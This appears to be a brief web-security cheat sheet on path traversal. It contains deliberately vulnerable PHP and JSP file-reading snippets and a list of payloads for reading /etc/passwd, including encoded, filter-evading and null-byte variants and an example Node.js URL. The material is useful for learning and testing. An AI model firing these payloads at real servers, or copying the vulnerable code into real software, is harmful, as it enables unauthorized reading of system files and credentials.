Path Traversal

Path traversl or directory traversal is an attack which allows an attacker to read aribitary files on the server that is running an application. Path traversal allows an attacker to read:

  • Sensative operating system files

  • Application code and data

  • Credentials for backend systems

Vulnerable code snippets

PHP

$file = $_GET['file'];
if(file_exists('/var/www/html/'.$file)) {
		readfile('/var/www/html/'. $file);
	}

JSP

String file = request.getParameter("file");
FileInputStream f = new FileInputStream("/var/www/"+file);
byte[]data = new byte[f.available()];
f.read(data);
f.close();
response.getOutputStream().write(data);

Techniques

  • Direct: /etc/passwd

  • Traversing: ../../../../../etc/passwd

  • If ../ is escaped: ....//....//....//....//

  • URL encoding: %2e%2e%2f

  • Double url encoding: %252e%252e%252f

  • Start path is validated and must start with expected base folder: /var/www/html/images/../../../../etc/passwd

  • File extension validated? use null byte: ../../../../../etc/passwd%00.png

Note: In case of node js applications may instances of traversal can occur directly by appending traversal sequence to some directory eg:

https://example.com/file/static/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

Last updated